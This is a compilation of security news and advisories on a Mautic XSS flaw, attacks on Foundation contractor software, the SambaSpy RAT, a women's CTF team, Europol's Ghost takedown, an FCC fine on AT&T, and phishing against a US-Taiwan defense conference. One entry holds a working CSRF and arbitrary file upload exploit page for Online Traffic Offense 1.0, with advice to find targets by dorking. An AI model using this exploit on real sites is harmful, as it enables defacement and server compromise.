## Summary
Prior to this patch being applied, Mautic's tracking was vulnerable to Cross-Site Scripting through the Page URL variable.
  
## Patches
Please update to 4.4.13 or 5.1.1 or later.

## Workarounds
None

## References
https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting

If you have any questions or comments about this advisory:

Email us at [security@mautic.org](mailto:security@mautic.org)

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-73gr-32wg-qhh7: Mautic vulnerable to XSS in contact/company tracking (no authentication)

By accessing the MSSQL, threat actors gain admin-level access to the application, allowing them to automate their attacks.

Source: ADDICTIVE STOCK CREATIVES via Alamy Stock Photo

Threat actors have been targeting Foundation accounting software commonly used by general contractors in the construction industry, leveraging active exploits within the plumbing, HVAC, and concrete sub-industries, among others.

Researchers at Huntress initially discovered the threat when tracking activity on Sept. 14. "What tipped us off was host/domain enumeration commands spawning from a parent process of sqlservr.exe," the researchers wrote in their advisory.

The software that the application uses includes a Microsoft SQL Server (MSSQL) instance for handling its database operations. According to the researchers, while it's common to keep database servers on an internal network or behind a firewall, Foundation software contains features that allow access through a mobile app. Because of this, "the TCP port 4243 may be exposed publicly for use by the mobile app. This 4243 port offers direct access to MSSQL."

In tandem, Microsoft SQL Server has a default system admin account, known as "sa," which has full administrative privileges over the entire server. With such high privileges, these accounts can enable users to run shell commands and scripts.

The threat actors targeting the application have been observed brute-forcing the application at scale as well as using default credentials to gain access to victim accounts. In addition, threat actors appear to be using scripts to automate their attacks.

It's recommended that organizations rotate their credentials associated with Foundation software and keep installations disconnected from the Internet to prevent falling victim to these attacks.

**About the Author**

Contractor Software Targeted via Microsoft SQL Server Loophole

Thought to be Brazilian in origin, the remote access Trojan is the "perfect tool for a 21st-century James Bond."

Source: Valentin Valkov via Shutterstock

"SambaSpy," a recently surfaced remote access Trojan (RAT), is loaded up with a Swiss Army knife-like set of functions for spying on victims and stealing data from them. Its creators, thought to be Brazilian, have also made the versatile RAT hard to detect and analyze by obfuscating it with Zelix KlassMaster, a legitimate Java obfuscation tool that developers often use to protect their code against reverse engineering and unauthorized modification.

**The Perfect Tool?**

Researchers at Kaspersky first spotted SambaSpy in May. "The malicious campaign we uncovered was exclusively targeting victims in Italy," Kaspersky said in a report this week. "It's likely that the attackers are testing the waters with Italian users before expanding their operation to other countries." More recent evidence suggests the attackers may be expanding to targets in Spain, Brazil, and potentially other countries, Kaspersky said.

SambaSpy is a RAT that an attacker can use to download and upload files, manage the file system and processes, load additional plug-ins, and take complete remote control of a compromised system. Among other functions, the RAT can also take screenshots, steal passwords, control webcams, and log keystrokes. It's a combination of capabilities that Kaspersky assessed would make the malware "the perfect tool for a 21st century James Bond villain."

Threat actors use remote access Trojans like SambaSpy for a variety of reasons. Some common use cases include targeted information stealing, dropping other malware, credential stealing, and cyber espionage.

**Testing the Waters**

SambaSpy's feature set appears to make the malware suitable for any of these purposes. Like most other RATs — and indeed any malware for that matter — the alleged Brazilian threat group behind it is distributing the malware via phishing emails spoofed to appear like they are from a real estate company.

Users who click on the call-to-action in the email are redirected to a website that checks the victim's operating system language and the browser. If the OS is in Italian and if the browser is Edge, Chrome, or Firefox, the malicious site injects a malicious PDF file containing either a dropper or a downloader that each do the same thing: install SambaSpy on the victim system. As is common with most modern malware, the SambaSpy dropper/downloader first checks if it has landed on a virtual system, before installing the malware. Interestingly, if the OS language is not Italian, the malicious website redirects the potential victim to a legitimate website for online invoices.

Though the tactic of using email to deliver SambaSpy might seem low-tech, it remains the most effective vector for initial access. A Trend Micro study conducted earlier this year showed email to be among the top initial access vectors; Trend Micro claims that 73.8 billion of the more than 161 billion threats that it blocked in 2023 used email as the initial access vector. The company expects such attacks are going to continue with generative AI tools that let attackers craft phishing lures that will also get progressively harder to spot.

"For the attackers, it doesn't really matter who they hit, nor are the particulars of the phishing bait important," Kaspersky said. "Today, it might be an invoice from a real estate agency; tomorrow, a tax notification; and the day after that, airline tickets or travel vouchers."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Packed With Features, 'SambaSpy' RAT Delivers Hefty Punch

The 12-member group will compete at the first all-women's capture-the-flag competition this November at the Kunoichi Cyber Games in Tokyo.

Source: Dmytro Sidelnikov via Alamy Stock Photo

Do they have what it takes to capture the flag? 

The 12 members of a new cyberteam will find out this fall, when four international teams meet at the Kunoichi Cyber Games to see whose cybersecurity athletes have what it takes to win in an intense cyberskills tournament. These cyber athletes will have to demonstrate their mastery of forensics, Web security, reverse engineering, binary exploitation, and cryptography in competition at the 2024 Code Blue Conference, Nov. 14 to 15, in Tokyo.

The cyber athletes come from across the United States. Some are college students, participating in their first cyber-gaming competitions. Others are cybersecurity professionals, who have been working in the industry. All of them are women. 

The Women's Cyber Team will be officially commissioned at Cybersecurity Career Week, an event sponsored by the House Cybersecurity Caucus, NICE, and SANS, in Washington, DC, on Sept. 19, kicking off the cyber season of competition for the fledgling team.

The US team will take on the teams from Japan, the United Kingdom, and the European Union during the competition. Five members and two substitutes will compete for eight hours in a capture-the-flag (CTF) contest, as well as an attack-and-defense competition. Each team member has a specialty area of focus and a subspecialty. 

**Developing Skills, Confidence**

The team is helmed by cybersecurity gaming veteran Ken Jenkins, CTO of Cymonix. A participant in many CTF and cyber tournaments held over the years, Jenkins was the head coach of the co-ed US Cyber Team in season 2 and the assistant head coach in season 3. The co-ed team is preparing for season 4's international competition later this year in Chile. 

For Jenkins, cyber gaming gives athletes the ability to flex their cyber muscles while developing skills and confidence – without their activities posing a threat to any actual business operations. 

"I think it really helps overcome imposter syndrome. It's also very validating of skills. They help you identify gaps and weaknesses. It also brings you together in a very safe place where you can make mistakes, and it doesn't cause a business outage, he says. "I remember days of defending a network where I did the same 30 things, right? I logged into this system, checked these alerts, did this, analyzed this file. Wash, rinse, repeat, for weeks on end."

Gamers, however, get the ability to reverse engineer a piece of malware or participate in red-team engagements that give them a plethora of new skills that they don’t get to exercise every day. 

**How the Team Came Together**

Choosing the 12 competitors for the team was no easy task, notes Chelsie Cooper, the team's assistant head coach and a senior intelligence analyst at CrowdStrike. 

Around 50 hopeful athletes participated in season IV of the US Cyber Open CTF in June. This initial pool was then culled to a smaller group based on an assessment that included scores from participating in any of the National Cyber League or US Cyber Open competitions. A smaller pool of candidates were interviewed, and their soft skills were as important as their cybersecurity chops, focusing on leadership and communication skills. 

"All of that came together in a very, very, very hard decision to only pick 12 of them because of all of them, they are very talented – well beyond their years," Cooper says. "They are going places."

Cooper's role as assistant head coach isn't to motivate the team, she says, because they're already incredibly driven. Rather, the focus is on strengthening existing skills and identifying knowledge and skills gaps.

"It's more so of a mentoring opportunity for us than it is anything else because they have the talent and they have the drive," she says. "We're just there to help guide them along the way to the competition."

Leading up to the November competition, the team has been holding biweekly virtual office hours with the coaches, discussing logistics and working on competition skills. Each team member also has a buddy. The older, more experienced players who have competition experience are mentoring younger members to bolster their weak spots and build confidence. 

**Building a Talent Pipeline**

While the co-ed US Cyber Team is for players ages 18 to 25, this new team recruited women ages 18 to 29 for the first year in an effort to build a pipeline of experienced women who could serve as coaches and mentors for future teams, says US Cyber Games Commissioner Jessica Gulick.

"In our field, with cyber games, even though you know cybersecurity and you're a cybersecurity professional, it doesn't automatically make you a good player for the game," Gulick says. "So having that experience is incredibly valuable."

The US Cyber Games program is in its fourth year; the co-ed team has 30 athletes, three of whom are women. Two of those women are also on the US Women's Cyber Team, including Shiloh Smiles, 24, a graduate of The Citadel in Charleston, SC. Smiles is pursuing a graduate degree in computer and electrical engineering at George Mason University, while also working as a penetration tester for the US Navy. 

For Smiles, the women's cybersecurity team offers a unique opportunity to combine a skill-building competition with social ambassadorship – and a way to make friends who share a common interest and will face some of the same workplace challenges. Women make up less than a quarter of the cybersecurity workforce. 

"Working in the military community, there are not many women, so it's very rare that I meet another woman who is technical," Smiles says. "That's been the best part of the team so far – to meet 11 other women who are highly technical. I just think it is super-duper cool. And we have the upcoming competition in November, which is going to be an all-women competition. So that's another opportunity to meet women from all over the world that are, again, highly technical. That's definitely what I'm most excited for – the networking in the community."

For 19-year-old Sarah Ogden, a student at Northern Kentucky University and one of the team's younger athletes, the opportunity to learn and develop her cybersecurity skills has been a motivating factor. She had participated in CTFs in the past, so she jumped at the chance to join the team – and travel internationally. Ogden says she is looking forward to checking out the variety of vending machines in Tokyo, but when it comes to the games itself, she is keeping her expectations in check.

"What I'm most looking forward to is trying to learn as much as I can," Ogden says. "I feel like my expectations are kind of low, so I'm not trying to stress myself out too much, just doing our best."

Head coach Jenkins would love for his team to come in first place in Tokyo, but winning isn't the only focus.

"We're really more focused on bringing the countries together, bringing the women together, having them share their experiences," Jenkins says. "I used to be dead-set on, 'We have to win, right?' But it's not the only thing that matters in this inaugural year."

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

Ready to Rumble: US Women's Cyber Team Preps for Global CTF Contest

Europol, alongside global law enforcement, dismantled the encrypted chat app Ghost, widely used by criminal networks for drug…

Europol, alongside global law enforcement, dismantled the encrypted chat app Ghost, widely used by criminal networks for drug trafficking, money laundering, and violent crime. The operation led to 51 arrests and key seizures.

Europol, Eurojust, and law enforcement agencies from nine countries have dismantled an encrypted communication platform, dubbed Ghost, which was being exploited by criminal networks around the world to facilitate large-scale illicit activities.

Ghost, designed with high-level encryption, had become a go-to tool for organised crime, enabling drug trafficking, money laundering, and even violent offences while evading law enforcement.

Renowned for its multiple encryption standards and self-destructing messaging feature, Ghost allowed criminal networks to communicate securely and evade detection. Authorities revealed that thousands of users globally were relying on Ghost for illegal operations, with nearly 1,000 encrypted messages exchanged daily on the platform.

****Major Arrests and Seizures****

The operation, which included coordinated raids and technical interventions, resulted in 51 arrests. Most of the suspects were detained in Australia, with 38 individuals apprehended, followed by 11 arrests in Ireland. Key suspects were also captured in Canada and Italy, with the latter involving members of the notorious Italian Sacra Corona Unita mafia.

Devices seized in the operation – Image: Europol

In addition to the arrests, a major drug lab was dismantled in Australia, and law enforcement seized weapons, drugs, and over €1 million in cash globally. Europol confirmed that several threats to life were thwarted during the operation, which is expected to lead to further arrests as investigations continue.

****A Global Coordinated Effort****

In a press release, Europol’s Executive Director, Catherine De Bolle, emphasized the importance of international collaboration in dismantling such sophisticated networks. “Today, we have made it clear that no matter how hidden criminal networks think they are, they cannot evade our collective effort,” De Bolle stated, praising the cooperation between nine nations and Europol in taking down Ghost.

The platform’s infrastructure was spread across several countries, with servers located in France and Iceland, owners traced to Australia, and financial assets linked to the U.S. The multinational taskforce established in March 2022, which involved countries such as Australia, Canada, France, and the United States, played a key role in identifying the suppliers and users of Ghost.

****EncroChat, Anom and Ghost****

In a similar move, Europol and related authorities successfully seized the European encrypted communication provider EncroChat in 2023, following a major takedown of the platform in 2020. The dismantling of EncroChat, which had been widely used by criminal networks for coordinating illegal activities, led to the arrests of hundreds of suspects across Europe.

In a similar operation in 2018, the Federal Bureau of Investigation (FBI) took control of the encrypted communications company Anom, known to users as the Anom app, while it was still in its infancy. The FBI transformed it into a large-scale honeypot, which ultimately led to the arrest of over 800 criminals in 2021.

Both proved crucial in disrupting organised crime, setting a precedent for the recent Ghost takedown and demonstrating Europol’s ongoing commitment to targeting encrypted communication systems exploited by criminals.

****International Cooperation****

This operation was supported by a Joint Investigation Team (JIT) between the U.S. and French authorities, alongside contributions from law enforcement in Australia, Canada, Ireland, Italy, the Netherlands, Sweden, and Iceland. Europol’s headquarters played a key role in coordinating the multi-country raids, deploying experts across Iceland, Ireland, and Australia.

As investigations continue, this operation signals a major victory for law enforcement agencies worldwide in their ongoing battle against organised crime. Yet, the dismantling of Ghost is only the latest chapter in an ongoing fight against encrypted tools that allow criminal organisations to operate in the shadows.

1.  **Europe’s largest known illegal IPTV op dismantled by police**
2.  **Europol takes down VPNLab used by ransomware operators**
3.  **Europol nabs 106 criminals involved in SIM swapping scams**
4.  **Europol Busts Major Online CSAM Racket in Western Balkans**
5.  **Telegram Founder Pavel Durov Reportedly Arrested in France**

Global Crime Hit as Europol Shuts Down Encrypted Chat App Ghost

Regulators fine AT&T $13 million for failing to protect customer information held by a third-party vendor, and extend consumer data protections to the cloud.

Source: B Christopher via Alamy Stock Photo

The Federal Communications Commission fined AT&T $13 million and ordered it to tighten up its privacy and security practices in the wake of a catastrophic third-party compromise.

The commission also used its authority under the Communications Act of 1934 to extend consumer protections to the cloud, finding AT&T failed to maintain proper oversight of a third-party provider.

That vendor, data warehousing provider Snowflake, reportedly was compromised in January 2023, exposing a host of organizations' sensitive data, among them AT&T's. In the weeks that followed the breach, AT&T acknowledged "nearly all" its customers were affected by exfiltrated call and text records, phone numbers, and other personally identifiable information.

Following an investigation, the FCC ruled on Sept. 16 that Snowflake should have been required to "destroy or return" the information years prior to the incident, and finding AT&T responsible for failing to appropriately protect its customer data.

"The Commission expects carriers to meet the requirement of the \[Communications Act of 1934\] and the Commission's rules, including to take 'every reasonable precaution' to protect customers' proprietary or personal information," the agency said in its ruling. "That includes reasonable practices as they relate to cloud security, data retention, and disposal."

In addition to the fine, the FCC ordered AT&T to improve its overall information security controls and practices, including "multifaceted vendor controls and oversight."

**About the Author**

FCC: AT&amp;T Didn't Adequately Protect Customers' Cloud Data

exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.

GHSA-723h-x37g-f8qm: Chaosblade vulnerable to OS command execution

Hackers sent a convincing lure document, but after 20 years of similar attacks, the target organization was well prepared.

Source: elifbayraktar via Alamy Stock Photo

A meeting of influential figures in and around the US and Taiwanese defense industries has been targeted by a phishing attack carrying fileless malware.

The 23rd US-Taiwan Defense Industry Conference will be held next week in Philadelphia's Logan Square neighborhood. Closed to the press, it will feature speakers from government, defense, academia, and commercial sectors in the US and Taiwan. The focus, according to its website, will be "addressing the future of US defense cooperation with Taiwan, the defense procurement process, and Taiwan's defense and national security needs."

Recently, the US-Taiwan Business Council — the organization behind the event — was sent a malicious forgery of its own registration form. The form was paired with information-stealing malware designed to execute entirely in memory, making it more difficult to detect with traditional antivirus software. Thanks to diligent anti-phishing preparations, however, the council quickly rebuffed the attack.

**Threats to a Taiwan Defense Conference**

Eight years ago, a Chinese phishing email was sent to members of Taiwan's defense industry, including some attendees of the 15th US-Taiwan Defense Industry Conference. Even by then, though, it was old hat.

"In the period from 2003 to 2011, we were heavily targeted with spear-phishing emails constantly," reports Lotta Danielsson, vice president of the US-Taiwan Business Council. "There was an uptick in 2016-2017, but it has been very quiet for the last several years. Usually, it increases in the leadup to and right after the annual defense conference, then it subsides again."

In the leadup to this year's conference, rather than attendees, the attack seemed to target the council itself. It came in an email, from an individual posing as a potential attendee. Rather than use the event's online form, the impersonator sent a filled out copy of the registration form as a PDF, which attendees can do if they experience technical issues with the site.

Source: Cyble

The document, according to analysis from Cyble, came with a ZIP file that was supposed to drop a malicious Windows shortcut (LNK) file. If opened, the LNK would have established persistence on its targeted machine by placing an executable file in the Windows startup folder. Upon reboot, the executable would download additional payloads to be executed directly in the machine's memory, without saving any files to disk. Ultimately, the malware could exfiltrate data back to an attacker-controlled server through Web requests designed to blend with normal network traffic.

Cyble researchers were unable to tie the attack to any specific threat actor. They noted, however, that Chinese entities in particular have a long history of targeting Taiwan.

"We've seen very clearly in the last few years that there are a lot of problems in East Asian geopolitics — military-related movements in the South China Sea, very sharp comments coming from Taiwan and China. And it looks like nation states are interested in US-Taiwan defense cooperation," says Kaustubh Medhe, head of research and intelligence for Cyble.

This latest phishing attempt fits neatly into that picture. "We have a strong suspicion that this could be used as a stealthy technique to perform long-term surveillance of people with a specific interest in this particular topic," he says.

**A Textbook Case of How to Prevent Phishing**

As Danielsson recalls, "We have been targeted by these types of spear phishing emails for a long time — more than 20 years — so we flagged it as suspicious right away. We did not open the file. Instead, we submitted it to VirusTotal and confirmed that it was malicious. Then we deleted it, and that was pretty much it."

She highlights a few keys to success that have helped the Council easily swat away its many phishing attacks over the years. "One is educational, so the entire staff is well educated on these types of attacks. Nobody clicks links in emails, or opens documents sent via email, unless we have talked to people directly and are expecting them. Even then, we often scan them before opening, unless the presumed content is very sensitive, in which case we will call people to double-check that they sent them," she says.

Besides that, she adds, "We keep our email clients text-only so it's easy to see any obfuscation of links right away. I log all traffic in and out of our system and keep an eye out for anomalies. We also take our entire system offline at night and on weekends, air-gapping our computers and internal IT systems. This is doable because we are a small office with three people, something that might be harder for a larger organization. I also have some relationships with people who work in the cybersecurity industry, and they have helped us think through what to do if we do end up failing to prevent an issue. We want to be prepared if it does."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Phishing Espionage Attack Targets US-Taiwan Defense Conference

Online Traffic Offense version 1.0 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 CSRF / Arbitrary File Upload

A vulnerability has been discovered and fixed in Mesop that could potentially allow unauthorized access to files on the server hosting the Mesop application. The vulnerability was related to insufficient input validation in a specific endpoint. This could have allowed an attacker to access files not intended to be served.

Users are strongly advised to update to the latest version of Mesop immediately. The latest version includes a fix for this vulnerability.

We would like to thank @Letm3through for reporting this issue and proposing mitigations to address this issue.

Tag

#auth